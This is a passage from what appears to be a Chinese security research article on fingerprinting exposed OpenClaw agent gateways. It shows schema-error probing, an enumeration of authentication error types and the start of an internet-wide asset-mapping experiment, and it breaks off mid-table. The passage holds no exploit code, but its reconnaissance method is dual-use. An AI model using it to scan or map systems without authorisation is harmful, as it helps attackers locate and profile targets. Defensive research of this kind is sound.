class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;INVALID_REQUEST&#34;</span><span class="code-snippet__punctuation">,</span></span></code><br/><code><span leaf="">    <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;invalid chat.history params: at root: unexpected property &#39;agentId&#39;&#34;</span></span></code><br/><code><span leaf="">  <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">特征要素：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">观察点</span></strong></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">现象</span></b></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="text-align: center;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">说明</span></strong></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">未认证请求</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">被 handshake 校验拦截</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">业务方法需要先认证</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">agentId 字段</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">报错 unexpected property</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">该字段不在 Schema 中</span></p></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">sessionKey 格式</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">静默接受</span></p></div></div></td><td data-colwidth="33.4100%" width="33.4100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="text-align: center;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">格式语法合法</span></p></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">测绘价值：</span></strong></p></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">确认处理链路</span></strong><span leaf=""> — 请求需经过 WebSocket 帧解析 → RPC 方法路由 → Agent 级参数校验</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">确认 Schema 独立性</span></strong><span leaf=""> — 不同方法的 Schema 是独立定义的</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">推断 sessionKey 格式</span></strong><span leaf=""> — agent:名称:平台:类型:ID 被 Schema 层接受</span></p></li></ol><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">这种通过&#34;故意触发 Schema 异常&#34;来探测内部结构的手法，本质上是一种安全的协议级 Fuzzing——不触碰业务逻辑，仅利用校验层的错误回显来逆向推导 API 定义。</span></p></div></div></div></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-bottom: 1px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: justify;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 9px;align-self: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 18px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹 4</span></strong></p></div></div><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: left;transform: translate3d(11px, 0px, 0px);-webkit-transform: translate3d(11px, 0px, 0px);-moz-transform: translate3d(11px, 0px, 0px);-o-transform: translate3d(11px, 0px, 0px);box-sizing: border-box;"><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证模式枚举</span></strong></p></div></div></div></div></div></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内容</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">认证要求</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">无需认证 ✅</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">探测方式</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">系统性遍历不同认证方式，观察错误响应</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指纹类型</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">主动指纹（需要发送请求）</span></p></div></div></td></tr></tbody></table></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 5px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 0px 0px 0px 9px;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="line-height: 1.3;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">经多次实验即对源码的分析发现错误响应主要有两种：</span></p></div></div><div style="text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">AUTH</span></em><span leaf="">* 系列（共享密钥认证）</span></p></div><div style="text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><em style="box-sizing: border-box;"><span leaf="">DEVICE_AUTH</span></em><span leaf="">* 系列（设备身份认证）</span></p></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><em style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">AUTH</span></strong></em><strong style="box-sizing: border-box;"><span leaf="">* 系列（共享密钥认证）：</span></strong></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.013210039630119" data-s="300,640" data-type="png" data-w="757" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011219" src="https://wechat2rss.xlab.app/img-proxy/?k=d3fc38b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmmqqlanCGbDzIUbJ1UZuaCn6ECMZs2bwcQMXspTfCDeGpzj7ib4VyOZiauomOuib7ChrVYalNIqia5KdzibdCC9lN99ARtJytPiava4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">举例：</span></strong></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf=""><span class="code-snippet__attr">&#34;error&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;unauthorized: gateway token mismatch&#34;</span></span></code><br/><code><span leaf=""> <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><em style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">DEVICE_AUTH</span></strong></em><strong style="box-sizing: border-box;"><span leaf="">* 系列（设备身份认证）：</span></strong></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5772787318361955" data-s="300,640" data-type="png" data-w="757" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011216" src="https://wechat2rss.xlab.app/img-proxy/?k=0f28c61a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmqCDPHNu3cT1Dv6nBtSQxwIA6vr19EJ3MOdWbtLLXHVR3hD2t84tcN1iaWCJErzDp380G4304z8N5Z0q8PNJcyNM4kWdfysGZg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">举例：</span></strong></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf=""><span class="code-snippet__attr">&#34;error&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__punctuation">{</span></span></code><br/><code><span leaf="">  <span class="code-snippet__attr">&#34;message&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;device signature invalid&#34;</span></span></code><br/><code><span leaf=""> <span class="code-snippet__punctuation">}</span></span></code><br/><code><span leaf=""><span class="code-snippet__punctuation">}</span></span></code><br/></pre></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其对应的认证因子主要有以下几种：</span></strong></p><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.40927152317880794" data-s="300,640" data-type="png" data-w="755" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011217" src="https://wechat2rss.xlab.app/img-proxy/?k=4af97ab5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmKUQ42rTibGVt0QvX4UZMxYA0DXRFo6pjODHgR4tYknJ0hOho9hb7ibDQNFv9O4rcO6LfdYYWib13HGDrqAacjJxfJAjMdg9sCL8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">测绘价值：</span></strong></p></div><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">完整认证架构地图</span></strong><span leaf=""> — </span><em style="box-sizing: border-box;"><span leaf="">AUTH*</span></em><span leaf=""> 系列：13 种错误原因；</span><em style="box-sizing: border-box;"><span leaf="">DEVICE_AUTH*</span></em><span leaf=""> 系列：7 种错误原因；6 种认证因子</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">确认防护机制</span></strong><span leaf=""> — 存在速率限制（`rate_limited`）；设备签名有时效性（device-signature-stale）；nonce 防重放（device-nonce-mismatch）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">确认设备配对机制</span></strong><span leaf=""> — 设备身份认证（</span><em style="box-sizing: border-box;"><span leaf="">DEVICE_AUTH*</span></em><span leaf="">）；共享密钥认证（</span><em style="box-sizing: border-box;"><span leaf="">AUTH*</span></em><span leaf="">）；设备签名验证优先于 token 验证</span></p></li></ol><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.30847457627118646" data-s="300,640" data-type="png" data-w="590" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011222" src="https://wechat2rss.xlab.app/img-proxy/?k=d51b48b8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClCg9I9XMoPmwCWcrjPp3beQMoBxicz6vDb6spMMbqeX4sicoTSN8p3rxM4kqLGzmhQmFgTvcyia7zlhn7Sf2SWcGC0qhCusbKic5A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 在野资产测绘：双轮验证实验</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">前面介绍的四层协议指纹，从理论层面展示了如何利用 ACP 协议的语义特征识别 OpenClaw 实例。但一个关键问题仍然存在：</span><strong style="box-sizing: border-box;"><span leaf="">这些指纹在真实网络环境中是否真的有效？</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">为了回答这个问题，我们设计了两轮在野验证实验，分别针对高噪声混合样本和大规模确定资产进行测试。</span></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验设计：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">项目</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">说明</span></strong></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">测试对象</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">对比&#34;ACP 协议语义指纹&#34;（新方案）与&#34;传统 HTTP 字符串匹配&#34;（旧方案）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">评估指标</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">命中率、一致性、互补性（仅单一方案命中的数量）</span></p></div></div></td></tr><tr style="box-sizing: border-box;"><td data-colwidth="33.0000%" width="33.0000%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验环境</span></strong></p></div></div></td><td data-colwidth="66.8100%" width="66.8100%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(62, 62, 62) rgb(223, 223, 223);border-style: none none solid;background-color: rgba(255, 255, 255, 0);padding: 3px;box-sizing: border-box;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="padding: 0px 5px;box-sizing: border-box;"><p style="text-align: center;word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">基于 Python WebSocket 客户端实现 ACP 握手探测</span></p></div></div></td></tr></tbody></table></p></div><div style="color: rgb(67, 146, 117);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">实验数据总览：</span></strong></p></div><div style="min-height: 40px;margin: 10px 0%;box-sizing: border-box;"><p style="width: 100%;margin: 0px auto -10px;box-sizing: border-box;"><table style="border-collapse: collapse;box-sizing: border-box;margin-bottom: 10px;"><tbody><tr style="box-sizing: border-box;"><td data-colwidth="33.3300%" width="33.3300%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) rgb(62, 62, 62) rgb(62, 62, 62);border-style: none;background-color: rgb(69, 109, 100);box-sizing: border-box;padding: 0px;"><div style="margin: 5px 0%;box-sizing: border-box;"><div style="text-align: center;padding: 0px 5px;color: rgb(255, 255, 255);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">指标</span></strong></p></div></div></td><td data-colwidth="33.1600%" width="33.1600%" style="border-width: 1px;border-color: rgb(62, 62, 62) rgb(255, 255, 255) 